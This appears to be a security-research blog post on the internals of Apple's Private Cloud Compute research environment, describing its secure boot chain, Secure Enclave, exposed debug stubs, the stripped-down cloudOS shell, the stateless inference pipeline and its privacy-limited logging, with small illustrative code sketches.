<p>iBoot then extends the boot chain by performing its own set of verifications. It validates multiple system firmware components against the APTicket, including three critical components: the Secure Page Table Monitor (SPTM), the Trusted Execution Monitor (TXM), and the Kernel Cache. After successful verification, iBoot hands off execution to the SPTM.</p>
<p>The Secure Page Table Monitor (SPTM) begins its initialization sequence with a critical bootstrap phase that establishes the fundamental security architecture of the system. During <code>bootstrap_stage_announce</code>, SPTM performs several crucial setup operations for the Protected Address Page Table (PAPT) ranges.</p>
<p>The initialization starts with <code>sptm_bootstrap_early</code>, which validates critical parameters, establishes the initial memory map, and prepares for the creation of secure page tables. The system then proceeds with <code>bootstrap_alloc_frames</code>, which allocates the initial set of CTRR-protected frames necessary for maintaining the security of the page table hierarchy.</p>
<p>During this early phase, SPTM configures the IOMMU through the processor subsystem initialization. This involves setting up secure DMA remapping tables, configuring Stream IDs (SIDs), and establishing the initial IOMMU translation tables. The system carefully validates each configuration step to ensure the integrity of IO memory operations.</p>
<p>Following SPTM's initial setup, the system proceeds to initialize the Trusted Execution Monitor (TXM). The TXM initialization process begins with the establishment of the secure execution environment and trust verification mechanisms. The system first loads and verifies the Image4 format firmware components, establishing the root of trust through certificate chain verification. It then initializes its trust cache system, setting up the verification pathways for different trust domains (PDI, DDI, cryptex). The process includes validation of <code>manifest-properties</code> and <code>boot-manifest-hash</code> to ensure the integrity of the boot chain.</p>
<p>The <code>CoreEntitlements</code> framework is initialized during this phase, establishing the infrastructure for runtime entitlement verification. This includes setting up the acceleration contexts and dictionary structures that will be used for efficient entitlement validation during system operation.</p>
<p>As the boot process continues, SPTM establishes the complete memory management infrastructure. The system initializes the page table hierarchy with strict reference counting (rc16) for tracking page table usage. SPTM sets up the PAPT ranges through <code>bootstrap_register_papt_range</code>, establishing protected memory regions that will be crucial for system security.</p>
<p>Before transferring control to the kernel, the system configures the dispatch mechanism that will control transitions between security domains, setting up the state machine transitions and validation requirements. SPTM then establishes the exception handling pathways through <code>sptm_dispatch</code>, ensuring that all security domain crossings will be properly validated and controlled throughout system operation.</p>
<p>The transfer of control to the kernel represents a critical transition in the boot process. SPTM ensures this transition occurs securely by validating the kernel's code signature through TXM's verification pipeline. It then establishes the initial set of page table mappings that the kernel will operate within, and sets up the security monitor hooks that will continue to enforce memory protection policies during runtime operation.</p>
<p>As the system completes initialization and transitions to user space, the security infrastructure established by SPTM and TXM continues to operate. The entitlement validation system enforces access controls and security policies for running applications. The IOMMU continues to enforce DMA security policies for device interactions.</p>
<p>TXM's trust cache system actively validates code signatures for all executable code loaded into the system, while SPTM performs fundamental security operations like page table management and memory protection. The system is designed such that a TXM compromise doesn’t automatically translate to an SPTM bypass due to this privilege separation.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1730742670973/45cf05d4-a1b3-47b8-80a7-19f5c92e828b.jpeg" alt class="image--center mx-auto" /></p>
<p>Parallel to this main boot sequence, the SEP (Secure Enclave Processor) undergoes its own independent boot chain, which begins simultaneously with the Application Processor (AP) boot sequence. The SEPROM (Secure Enclave Boot ROM) begins execution from immutable code laid down during SoC fabrication, forming the hardware root of trust for the SEP.</p>
<p>The initial boot sequence involves SEPROM setting up the MMU to enable virtual memory address translation. During this initialization phase, SEPROM performs critical setup tasks including storing CPU tick counts, configuring stack pointers, setting up exception vectors, and initializing different CPU modes. Communication between SEP and AP occurs through a dedicated mailbox interface, which is the only communication channel between the two processors. This interface operates through mapped IO registers accessible to both processors, with messages limited to 8 bytes following a structured protocol with specific opcodes.</p>
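<p>To get a feel for how little fits in an 8-byte mailbox message, here is a sketch that packs and unpacks one. The field layout (endpoint, tag, opcode, parameter, and a 32-bit data word) is an assumption loosely modelled on public SEP research, not something taken from Apple documentation, and both helper functions are hypothetical.</p>

```python
import struct

# Assumed layout: four 1-byte fields followed by a 32-bit little-endian word.
MESSAGE_FORMAT = "<BBBBI"
assert struct.calcsize(MESSAGE_FORMAT) == 8  # matches the 8-byte limit


def pack_message(endpoint: int, tag: int, opcode: int, param: int, data: int) -> bytes:
    """Serialize one mailbox message into exactly 8 bytes."""
    return struct.pack(MESSAGE_FORMAT, endpoint, tag, opcode, param, data)


def unpack_message(raw: bytes) -> dict:
    """Parse an 8-byte mailbox message back into named fields."""
    if len(raw) != 8:
        raise ValueError("mailbox messages must be exactly 8 bytes")
    endpoint, tag, opcode, param, data = struct.unpack(MESSAGE_FORMAT, raw)
    return {"endpoint": endpoint, "tag": tag, "opcode": opcode,
            "param": param, "data": data}


raw = pack_message(endpoint=0, tag=1, opcode=2, param=0, data=0xDEADBEEF)
decoded = unpack_message(raw)
print(raw.hex(), decoded)
```

<p>With so little room per message, anything larger (such as the firmware image itself) has to be passed by reference through shared memory rather than inline.</p>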
<p>iBoot is responsible for initiating communication with SEPROM through this mailbox interface. iBoot sends the SEP firmware to SEPROM and sets up the TZ0 registers that define protected memory regions. These TZ0 registers are crucial for memory isolation, using both base and end registers that, once locked, prevent AP access to SEP memory regions.</p>
<p>The memory protection mechanism employs three layers: isolation through AMCC (Apple Memory Cache Controller) preventing AP access to TZ0 memory, encryption using AES-256-XEX(XTS) mode with two 32-byte keys, and integrity checking through checksums of encrypted memory.</p>
<p>SEPROM independently verifies the signature of the sepOS firmware against measurements stored in the APTicket (Image4 boot manifest). Upon successful verification, SEPROM locks these measurements into the <code>SEAL_DATA</code> register, similar to how Boot ROM locks AP measurements in <code>SEAL_DATA_A</code>. This locking mechanism is immutable and cannot be altered after manufacturing, ensuring the integrity of the boot chain.</p>
<p>The actual loading of sepOS occurs after successful verification, with SEPROM copying the verified firmware into protected memory regions established by the TZ0 configuration. The memory layout includes dedicated RAM regions for stack and data, along with carefully mapped IO registers and shared memory regions. After loading sepOS, SEPROM sets up bootargs and transfers control to the SEP firmware.</p>
<p>Once sepOS begins execution, it initializes the SEP application environment, setting up crucial security services including the Public Key Accelerator (PKA) and various cryptographic operations. The SEP maintains its own nonce for DFU/Recovery operations, further isolating its security state from the AP. Throughout this entire process, the memory regions remain protected by the TZ0 configuration established earlier, preventing any unauthorized access from the AP side.</p>
<p>The PCC, as with other Apple hardware, relies heavily on the Secure Enclave Processor (SEP) for boot and code integrity checking. While the PCC in itself is neat, Apple’s new open-gate approach to sepOS caught many by surprise.</p>
<p>In iOS 18 Developer Beta 4, Apple <a target="_blank" href="https://developer.apple.com/documentation/ios-ipados-release-notes/ios-ipados-18-release-notes#:~:text=The%20firmware%20image,more%20details.%20\(125171074\)">announced</a> that the iBoot and sepOS firmware for the PCC is being released in plaintext. This also coincided with the disabling of firmware encryption for iBoot on iOS, macOS, watchOS, tvOS, and visionOS to reduce performance overhead.</p>
<p>Although it wasn’t mentioned in the release notes, looking through the source code reveals that Apple exposes a GDB stub for the SEP.</p>
<pre><code class="lang-swift"><span class="hljs-keyword">case</span> .vresearch101:
    <span class="hljs-keyword">let</span> sep_config = _VZSEPCoprocessorConfiguration(storageURL: bundle.sepStoragePath)
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">let</span> avpsepbooter { <span class="hljs-comment">// default AVPSEPBooter.vresearch1.bin from VZ framework</span>
        sep_config.romBinaryURL = avpsepbooter
    }
    sep_config.debugStub = _VZGDBDebugStubConfiguration()
    config._coprocessors = [sep_config]

    pconf._isProductionModeEnabled = (platformFusing == .prod)
</code></pre>
<p>Listing all open ports, we can see that there isn’t just one open port relating to Apple, but three. The top one is the kernel GDB stub I mentioned earlier, and I can’t seem to find anything related to <code>53705</code>.</p>
<pre><code class="lang-bash">➜  ~ lsof -PiTCP -sTCP:LISTEN
pccvre    21915 zefiepie   14u  IPv4 0x5c32866ea688829f      0t0  TCP 192.168.64.1:53704 (LISTEN)
com.apple 21923 zefiepie    7u  IPv4 0x98c787175eb69f32      0t0  TCP localhost:53705 (LISTEN)
com.apple 21923 zefiepie    9u  IPv4 0x65a79314b9e6fe98      0t0  TCP localhost:53706 (LISTEN)
com.apple 21925 zefiepie    3u  IPv4 0x65a79314b9e6fe98      0t0  TCP localhost:53706 (LISTEN)
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1731752474529/007b1399-ab61-48e3-be6b-601f99f9580b.png" alt class="image--center mx-auto" /></p>
<p><code>53706</code> is the GDB stub for the Secure Enclave. We can figure this out by disassembling some of the code in the higher address ranges, where we find a string indicating the sepOS boot code, which then jumps to the kernel address. This will likely be an interesting avenue for SEP/iBoot research moving forward.</p>
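<p>If you would rather poke at these stubs from a script than from lldb, the framing is simple, assuming they speak the standard GDB Remote Serial Protocol: a packet is <code>$</code>, the payload, <code>#</code>, and a two-digit hex checksum (the sum of the payload bytes modulo 256). The helpers below are a minimal sketch that ignores payload escaping and run-length encoding.</p>

```python
def frame_packet(payload: str) -> bytes:
    """Wrap a payload in GDB remote protocol framing: $<payload>#<checksum>."""
    body = payload.encode("ascii")
    checksum = sum(body) % 256
    return b"$" + body + b"#" + f"{checksum:02x}".encode("ascii")


def parse_packet(raw: bytes) -> str:
    """Validate the framing and checksum, then return the payload."""
    if len(raw) < 4 or not raw.startswith(b"$") or raw[-3:-2] != b"#":
        raise ValueError("not a framed packet")
    body = raw[1:-3]
    checksum = int(raw[-2:], 16)
    if sum(body) % 256 != checksum:
        raise ValueError("checksum mismatch")
    return body.decode("ascii")


query = frame_packet("qSupported")
halt_reason = frame_packet("?")
print(query, halt_reason, parse_packet(query))
```

<p>Sending <code>query</code> over a TCP socket to one of the listening ports and looking at the reply would be a quick way to check what features a given stub advertises.</p>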
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1730742569349/71a1cde8-af00-4655-9d9f-1017010c587a.jpeg" alt class="image--center mx-auto" /></p>
<p>The final stage of initialization occurs in user space, where the darwin-init task takes control. This task configures the node based on information it receives from the BMC, including determining which cryptexes to load. After loading all required cryptexes, darwin-init initiates the transition into Restricted Execution Mode (REM). This transition is a one-way process that must meet specific conditions: all "before" code must be unloaded from memory, and the Cryptex Manifest Register must be locked. Only after entering REM does the node become available to serve external requests.</p>
<p>Throughout this process, the system employs Software Sealed Registers (SSRs) to maintain a verifiable record of the boot state. Two specific SSRs are crucial: the Cryptex Manifest Register, which contains digests of Image4 manifests from activated cryptexes, and the Configuration Seal Register, which holds digests of critical darwin-init configuration data. These registers operate on a ratcheting mechanism - once updated, their values cannot be rolled back, and their state is included in all attestations generated by the SEP.</p>
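<p>The ratcheting behaviour is easiest to understand as a hash chain, similar in spirit to a TPM PCR. The sketch below is an assumption about the general shape of such a register, not Apple's actual construction: the <code>RatchetRegister</code> class, the SHA-384 choice, and the all-zero starting value are illustrative.</p>

```python
import hashlib


class RatchetRegister:
    """Toy software-sealed register: values can be extended, never rolled back."""

    def __init__(self):
        self.value = bytes(48)  # assumed all-zero initial state
        self.locked = False

    def extend(self, digest: bytes) -> None:
        if self.locked:
            raise PermissionError("register is locked")
        # The new value depends on the old value, so history cannot be undone.
        self.value = hashlib.sha384(self.value + digest).digest()

    def lock(self) -> None:
        self.locked = True


def manifest_digest(manifest: bytes) -> bytes:
    return hashlib.sha384(manifest).digest()


cryptex_manifest_register = RatchetRegister()
for manifest in (b"manifest: PrivateCloudSupport", b"manifest: model cryptex"):
    cryptex_manifest_register.extend(manifest_digest(manifest))
cryptex_manifest_register.lock()  # e.g. right before entering REM

# Same manifests in a different order produce a different final value.
reordered = RatchetRegister()
for manifest in (b"manifest: model cryptex", b"manifest: PrivateCloudSupport"):
    reordered.extend(manifest_digest(manifest))

print(cryptex_manifest_register.value.hex()[:16], reordered.value.hex()[:16])
```

<p>Because every extension folds in the previous value, a verifier that knows the expected manifests can recompute the final value, while a node cannot quietly "forget" a cryptex it has already activated.</p>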
<p>After the process completes, this is where the fun starts. We are offered different ways to interact with the PCC:</p>
<ul>
<li><p>An HTTP service is started. I have no idea what it is used for, but it returns an <code>IOError (other) pread(descriptor:pointer:size:offset:): Is a directory (errno: 21)</code></p>
</li>
<li><p>A GDB stub for kernel debugging</p>
</li>
<li><p>A debug shell <a target="_blank" href="https://keith.github.io/xcode-man-pages/cryptex.5.html">cryptex</a> that contains a shell (through SSH)</p>
</li>
</ul>
<h2 id="heading-ios-now-more-lobotomized">iOS, Now More Lobotomized!</h2>
<p>As said before, CloudOS is just a cut-down version of iOS, stripped down even further than iOS already is. Using the debug cryptex, we can gain a shell on CloudOS over SSH to see for ourselves.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729873812890/2b84bffe-1e16-4d3c-af35-22b6d2c5e45e.png" alt class="image--center mx-auto" /></p>
<p>After enabling SSH in the PCC VRE instance, you can simply log in to it like usual.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729873853347/7dde73df-ed3d-4776-8fd0-5aa80cd2a463.png" alt class="image--center mx-auto" /></p>
<p>Welcome to cloudOS. Something you quickly discover is how barebones the VM is. There is no <code>help</code> or <code>clear</code> command, nor any sort of package management system like <code>apt</code> or <code>brew</code>. Built-in interpreters, debuggers, and any sort of Just-In-Time compiler functionality were also removed to prevent dynamic code execution.</p>
<p>After diving into <code>/var/</code> we finally arrive at the meat of the PCC, which contains a lot of files crucial for PCC operations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729874647202/bbaf7366-80c9-485c-8e60-21dc749f6f31.png" alt class="image--center mx-auto" /></p>
<p>There are a lot of interesting things here, such as <code>DarwinDataCenterSupportImage</code>, which contains support packages for the system and is also the place where custom cryptexes are loaded and stored. There are also several remnant folders from iOS such as <code>mail</code> and <code>backups</code>, which are empty and unused (as far as I know).</p>
<p><code>MLModels</code> also caught my eye. It contains the ML models used for the PCC, including a small model called <code>FM_LANGUAGE_SECURITY_RESEARCH_V1</code> used for testing purposes.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729878336987/1b85a3ba-d1a2-4e1b-8679-7bd50bea655e.png" alt class="image--center mx-auto" /></p>
<p>Additionally, as previously mentioned the PCC VRE provides a GDB stub you can use to connect lldb to. The stub supposedly allows for reading/writing within kernel memory, but without the symbols necessary this is still not that useful.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1731749615504/44dba9d4-78b9-4860-a773-8dad79a48ed2.png" alt class="image--center mx-auto" /></p>
<p>The fact that there is no way I can figure out (at least currently) to take data out of the vanilla PCC VRE kinda makes me believe that Apple is making good on its promise to not use user data and interactions with Apple Intelligence for training purposes.</p>
<h2 id="heading-stateless-inferencing">Stateless Inferencing</h2>
<p>PCC VRE won’t be the only example of using confidential computing for securing inference workloads, as Google has already published <a target="_blank" href="https://github.com/google/genc/blob/master/genc/docs/tutorials/tutorial_6_confidential_computing.ipynb">a proof-of-concept implementation</a> using gRPC over HTTPS to connect to a Confidential VM containing Gemma 2B.</p>
<p>Rather than requiring a complex setup with a client device, the PCC VRE offers a wrapper to talk to the LLM inside of the PCC.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729875735144/a0938d06-57f7-4d1d-a7ee-d77d291771e5.png" alt class="image--center mx-auto" /></p>
<p>The wrapper connects to an endpoint provided by the <code>cloudboardd</code> service in the Virtual Research Environment (VRE). This is the same endpoint that the PCC Gateway utilizes for connecting to PCC nodes in production environments. The <code>pccvre</code> tool leverages the CloudBoard and TIE application protocols to handle request submission and response display.</p>
<p>The command prints the result of the SEP attestation, then tokens as they are streamed, and finally the fully formed response.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729875887059/7e3dae1d-8009-4b3b-9253-a66d2486cc81.png" alt class="image--center mx-auto" /></p>
<p>The idea is that once your request has been processed within the PCC and the response has been sent back to you, the data is immediately destroyed. User data is designed to never be available to Apple, even to staff with administrative access to the production service or hardware.</p>
<p>The core of the inference operations lies in The Inference Engine (TIE), which handles the logic of executing inference requests that users submit to PCC. Requests are received on the PCC node by <code>CloudBoard</code>, which is responsible for implementing the cryptographic protocol with a user’s device, and are then handed off to TIE for processing. The <code>tie-model-owner</code> process employs the ModelCatalogSE framework to load model weights, adapters, and associated parameters from disk into memory.</p>
<p>ModelCatalogSE maintains an index of model data and metadata, including tokenizers, stop tokens, and prompt templates, which are derived from model and adapter cryptexes on the PCC node. The inference components operate under the orchestration of a single <code>tie-controllerd</code> daemon, which functions as TIE's primary control system: it manages inference process recycling and initiates periodic CIO mesh key rotations. Furthermore, <code>tie-controllerd</code> interfaces with CloudBoard's runtime-configurable properties to retrieve prompt deny lists, which enumerate blocked inputs that could potentially compromise system stability.</p>
<p>When requests arrive at a PCC node, TIE processes them through an ephemeral, per-request <code>tie-cloud-app</code> instance. The system uses process pooling to mitigate the runtime overhead of spawning processes: the pool consists of pre-instantiated <code>cb_jobhelper</code> and <code>tie-cloud-app</code> pairs kept ready to service requests. Once CloudBoard selects a <code>tie-cloud-app</code> instance to handle a request, the application deserializes the incoming Protobuf-encoded request, validates request parameter safety, and tokenizes the string-based prompt using the tokenizer specified by the model cryptex.</p>
<pre><code class="lang-plaintext">message InvokeWorkloadRequest {
    oneof type {
        Setup setup = 1;
        Terminate terminate = 2;
        Chunk request_chunk = 3;
        Parameters parameters = 4;
    }
}

message InvokeWorkloadResponse {
    oneof type {
        SetupAck setup_ack = 1;
        Chunk response_chunk = 2;
    }
}
</code></pre>
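<p>A <code>oneof</code> like the one above means every message on the stream is exactly one of a handful of variants, so the receiving side is essentially a small state machine. The sketch below mirrors the request variants with plain dataclasses; the field contents, the requirement that <code>Setup</code> comes first, and the <code>RequestSession</code> class are assumptions, not the actual CloudBoard implementation.</p>

```python
from dataclasses import dataclass


@dataclass
class Setup:
    pass


@dataclass
class Parameters:
    values: dict  # hypothetical payload


@dataclass
class Chunk:
    data: bytes  # hypothetical payload


@dataclass
class Terminate:
    pass


class RequestSession:
    """Toy per-request handler that keeps state only for one request."""

    def __init__(self):
        self.ready = False
        self.parameters = None
        self.buffer = bytearray()

    def handle(self, message):
        if isinstance(message, Setup):
            self.ready = True
            return "setup_ack"
        if not self.ready:
            raise RuntimeError("message received before setup")
        if isinstance(message, Parameters):
            self.parameters = message.values
        elif isinstance(message, Chunk):
            self.buffer.extend(message.data)
        elif isinstance(message, Terminate):
            # Drop everything tied to this request.
            self.buffer.clear()
            self.parameters = None
            self.ready = False
        else:
            raise TypeError(f"unknown message type: {type(message).__name__}")
        return None


session = RequestSession()
ack = session.handle(Setup())
session.handle(Parameters({"max_tokens": 16}))
session.handle(Chunk(b"hel"))
session.handle(Chunk(b"lo"))
received = bytes(session.buffer)
session.handle(Terminate())
print(ack, received, bytes(session.buffer))
```

<p>Keeping all request state inside one short-lived object is the same idea, in miniature, as the per-request <code>tie-cloud-app</code> process: when the request ends, there is nothing left to leak.</p>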
<p>TIE executes tokenization within a per-request process to isolate untrusted string input parsing. The implementation of per-request process instances ensures that potential process compromises would not expose other users' request data. The system discards all intermediate request data upon request completion and process termination. After initial request processing, the <code>tie-cloud-app</code> transmits the request to a shared <code>tie-inference</code> process that executes the inference using MetalLM. The request data encompasses the tokenized input, model and adapter identifiers for inference, sampling parameters, and when applicable, the constrained decoding grammar.</p>
<p>To minimize the risk of unexpected user data retention beyond single request lifetimes in the inference host process, <code>tie-controllerd</code> periodically terminates and restarts <code>tie-inference</code>, which ensures that data processed within previous inference host instances remains inaccessible to potential attacks that might compromise future instances.</p>
<p>Within <code>MLModels/LLM/FM_LANGUAGE_SECURITY_RESEARCH_V1/LLM.Model/4.0.0</code> sits a 1.8 GB <code>model.mlm</code> file, which is a small machine learning model created in Apple Create ML. Admittedly I was a bit disappointed, because I thought Apple would offer a peek into the bigger LLMs they supposedly have in the cloud.</p>
<p>The model within the PCC VRE is likely based on Apple’s open source <a target="_blank" href="https://huggingface.co/apple/OpenELM-450M">OpenELM-450M</a>, judging simply by the model size (roughly 450 million parameters at 4 bytes each comes to about 1.8 GB), with the model converted to support Apple’s Create ML framework. The PCC, however, is supposed to house bigger models called <a target="_blank" href="https://arxiv.org/pdf/2407.21075">Apple Foundation Models (AFM)</a>, which are dense decoder-only models that build on the Transformer architecture with the following design choices:</p>
<ul>
<li><p>A shared input/output embedding matrix to reduce parameter count, and therefore memory usage.</p>
</li>
<li><p>Pre-Normalization with RMSNorm for training stability.</p>
</li>
<li><p>Query/key normalization to improve training stability.</p>
</li>
<li><p>Grouped-query attention (GQA) with 8 key-value heads to reduce the KV-cache memory footprint.</p>
</li>
<li><p>SwiGLU activation for higher efficiency.</p>
</li>
<li><p>RoPE positional embeddings with the base frequency set to 500k for long-context support.</p>
</li>
</ul>
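<p>To see why grouped-query attention matters for memory, it helps to work out the KV-cache size. The sketch below uses the usual estimate of two tensors (keys and values) per layer; only the 8 key-value heads come from the list above, while the layer count, query head count, head dimension, and sequence length are hypothetical numbers picked for illustration.</p>

```python
def kv_cache_bytes(layers: int, kv_heads: int, head_dim: int,
                   seq_len: int, bytes_per_value: int = 2) -> int:
    """Estimate KV-cache size for one sequence: K and V tensors for every layer."""
    return 2 * layers * kv_heads * head_dim * seq_len * bytes_per_value


# Hypothetical model shape; only KV_HEADS = 8 comes from the article.
LAYERS, QUERY_HEADS, KV_HEADS, HEAD_DIM, SEQ_LEN = 32, 32, 8, 128, 4096

mha = kv_cache_bytes(LAYERS, QUERY_HEADS, HEAD_DIM, SEQ_LEN)  # one KV head per query head
gqa = kv_cache_bytes(LAYERS, KV_HEADS, HEAD_DIM, SEQ_LEN)     # 8 shared KV heads

print(f"MHA: {mha / 2**20:.0f} MiB, GQA: {gqa / 2**20:.0f} MiB, "
      f"saving: {mha // gqa}x")
```

<p>With these made-up dimensions, sharing 8 key-value heads across 32 query heads cuts the per-sequence cache by a factor of four, which adds up quickly on a node serving many requests.</p>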
<p>Consistent with Apple’s whole branding on privacy preservation, the data used to train the models behind Apple Intelligence is also publicly documented. The AFM pre-training dataset consists of a diverse and high quality data mixture:</p>
<ol>
<li><p>Web pages: Crawled using Applebot, respecting publishers’ rights to opt out. The data is filtered to exclude profanity, unsafe material, personally identifiable information (PII), and processed through a pipeline that performs quality filtering, plain-text extraction, and decontamination against 811 common pre-training benchmarks.</p>
</li>
<li><p>Licensed datasets: High-quality data licensed from publishers, providing diverse and long-context data for continued and context-lengthening stages of pre-training. The data is decontaminated in the same way as web pages.</p>
</li>
<li><p>Code: Obtained from license-filtered open-source repositories on GitHub, covering 14 common programming languages. The data is de-duplicated, filtered for PII and quality, and decontaminated in the same fashion as web pages.</p>
</li>
<li><p>Public datasets: High-quality publicly-available datasets with licenses permitting use for training language models. The datasets are filtered to remove PII before being included in the pre-training mixture.</p>
</li>
<li><p>Math: Two categories of high-quality data sourced from the web:</p>
<ul>
<li><p>Math Q&amp;A dataset: 3 billion tokens from 20 web domains rich in math content, extracted by identifying relevant tags from HTML pages.</p>
</li>
<li><p>Collection of 14 billion tokens from web pages such as math forums, blogs, tutorials, and seminars. The data is filtered using a specialized pipeline that includes math tag filters, symbol filters, quality filters powered by language models, and domain filters processed by humans.</p>
</li>
</ul>
</li>
</ol>
<p>While there are concerns that the models inside of the PCC <a target="_blank" href="https://blog.trailofbits.com/2024/06/14/pcc-bold-step-forward-not-without-flaws/">can still use user data for training</a>, <a target="_blank" href="https://support.apple.com/en-us/120320#:~:text=We%20do%20not%20use%20our,publicly%20available%20on%20the%20internet.">Apple has said that</a> it does not use private user data or interactions with Apple Intelligence when training its foundation models. If Apple complies with this, then it does mean that they have achieved the capability to do stateless inferencing without resorting to the exotic methods mentioned earlier.</p>
<h2 id="heading-minimal-logging-and-telemetry">Minimal Logging and Telemetry</h2>
<p>Every single server-side application will need some sort of logging and telemetry system to ensure the availability and security of the applications being run. But how do you do it inside of a system that is supposed to be a black box to outsiders and does not collect any data whatsoever?</p>
<p>At the core of this is <code>CloudMetrics</code>, which implements the swift-metrics API backend. This system enables software within the <code>PrivateCloudSupport</code> cryptex to log various metric types including counters, gauges, and histograms. The metric collection process follows a structured flow where observations are first provided to the <code>CloudMetrics</code> framework, then transmitted via XPC to the <code>cloudmetricsd</code> daemon where temporal aggregation occurs locally. These aggregated metrics are subsequently exported to Apple's metrics service using the OpenTelemetry Protocol, an industry standard for observability data transmission.</p>
<p>The system implements strict controls over metric collection through a restrictive allow-list mechanism within CloudMetrics. This framework exercises granular control over metric export frequency and implements filtering based on metric names, allowed dimensions, and valid value ranges. Importantly, these configurations reside within the <code>PrivateCloudSupport</code> cryptex, ensuring they fall under PCC's verifiable transparency guarantees.</p>
<p>For logging capabilities, PCC utilizes the privacy-conscious <code>os_log</code> API, with log export handled by the <code>splunkloggingd</code> daemon. This daemon implements sophisticated filtering rules that operate on a per-log-line basis, scrutinizing both the message sender (identified by the Mach-O image) and the format string. The system maintains a carefully curated allow list of permitted messages, which undergoes rigorous privacy review considering not only the format strings but also the data types of included variables.</p>
<p>The crash reporting system in PCC builds upon existing privacy-preserving infrastructure from macOS and iOS, but implements additional safeguards. It categorizes crash data into intrinsically safe attributes (such as OS version and process IDs) and process state dependent data (like stack traces and register state). The system applies two levels of redaction - partial and full - with strict rate limiting of partially redacted logs to a maximum of three per node per hour, randomly selected from 20% of crashes.</p>
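<p>As a rough illustration of that policy, here is a minimal C sketch of how a node could choose between partial and full redaction. The 20% sample and the limit of three per hour come from the description above; the <code>crash_limiter</code> struct, the function name, and the fixed one-hour window are assumptions of mine and not Apple's actual implementation.</p>
<pre><code class="lang-c">#include &lt;assert.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

#define PARTIAL_LIMIT_PER_HOUR 3u   /* from the text: at most three per node per hour */
#define PARTIAL_SAMPLE_PERCENT 20u  /* from the text: drawn from 20% of crashes */
#define SECONDS_PER_HOUR       3600u

typedef enum { REDACTION_FULL, REDACTION_PARTIAL } redaction_level;

/* Hypothetical per-node state, not an Apple data structure. */
typedef struct {
    uint64_t window_start;  /* start of the current one-hour window, in seconds */
    uint32_t partial_count; /* partially redacted reports emitted in this window */
} crash_limiter;

/*
 * Decide how heavily one crash report is redacted.
 * `now` is a timestamp in seconds. `roll` is a random value in [0, 99]
 * supplied by the caller, so the policy itself stays deterministic.
 */
redaction_level choose_redaction(crash_limiter *lim, uint64_t now, uint32_t roll)
{
    assert(lim != NULL);
    assert(roll &lt; 100);

    /* Start a fresh window once an hour has passed. */
    if (now - lim-&gt;window_start &gt;= SECONDS_PER_HOUR) {
        lim-&gt;window_start  = now;
        lim-&gt;partial_count = 0;
    }

    /* Only a 20% sample of crashes is even eligible for partial redaction. */
    if (roll &gt;= PARTIAL_SAMPLE_PERCENT)
        return REDACTION_FULL;

    /* Eligible, but the hourly budget is already spent. */
    if (lim-&gt;partial_count &gt;= PARTIAL_LIMIT_PER_HOUR)
        return REDACTION_FULL;

    lim-&gt;partial_count++;
    return REDACTION_PARTIAL;
}
</code></pre>
<p>Passing the random roll in as an argument keeps the decision easy to reason about: a fourth eligible crash inside the same hour falls back to full redaction, and the budget resets only once the window rolls over.</p>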
<p>We finally meet again with <a target="_blank" href="https://research.meekolab.com/internals-of-macos-endpoint-security-products">an old friend</a>, the <code>EndpointSecurity</code> API, which is responsible for monitoring security events in macOS. PCC nodes capture only a few events, mainly:</p>
<ul>
<li><p><code>ES_EVENT_TYPE_NOTIFY_EXEC</code> (for process execution)</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_EXIT</code> (for process exit)</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_IOKIT_OPEN</code> (activation of certain hardware features)</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_OPENSSH_LOGIN</code> (SSH logins)</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_OPENSSH_LOGOUT</code> (SSH logouts)</p>
</li>
<li><p><code>NetworkStatistics</code> (Network inbound/outbound connections)</p>
</li>
</ul>
<p>The security event collection system prioritizes metadata capture over process introspection, implementing a privacy-first approach to security monitoring. Event export occurs through the <code>splunkloggingd</code> daemon, utilizing the same robust filtering mechanism that governs log message export. The configuration controlling permitted security events resides within the PrivateCloudSupport cryptex, ensuring transparency and verifiability of the monitoring scope.</p>
<p>All collected security events undergo aggregated analysis by Apple's security teams to identify potential compromise indicators. This analysis occurs within a framework that maintains PCC's core privacy guarantees while enabling effective security monitoring. The system achieves this balance by focusing on event patterns and metadata analysis rather than direct examination of process internals or user data.</p>
<p>The entire observability and security monitoring infrastructure operates within PCC's network security framework, controlled by the <code>denaliSE</code> firewall agent. This agent ensures that all monitoring and metric data transmission occurs only to authorized data center services, operating under mutual TLS authentication with certificates managed by the Secure Enclave Processor. This network-level control provides an additional layer of protection against unauthorized data exfiltration while enabling essential operational monitoring.</p>
<h1 id="heading-conclusions">Conclusions</h1>
<p>From the brief examination of the OS and tooling surrounding the PCC, we can somewhat confidently say that Apple is at least lining itself up for a really big lawsuit if it doesn’t play along with its privacy guarantees for Apple Intelligence and other offloaded AI/ML workloads. There is probably much more to discover, which will probably be covered by people that are way more technically proficient than myself.</p>
<p>I think the privacy guarantees around Apple Intelligence and the unprecedented access to the tools that support its secure operations are a big step towards providing a more privacy-preserving AI platform, which has certainly come a long way from Apple’s first inclusion of privacy-preserving technologies like the Secure Enclave. Apple has been working hard on implementing other, more bulletproof, solutions such as <a target="_blank" href="https://machinelearning.apple.com/research/homomorphic-encryption">Homomorphic Encryption (HE) for ML workloads</a> and a focus on more on-device inference for sensitive items such as <a target="_blank" href="https://developer.apple.com/documentation/sensitivecontentanalysis/detecting-nudity-in-media-and-providing-intervention-options">sensitive content detection</a>.</p>
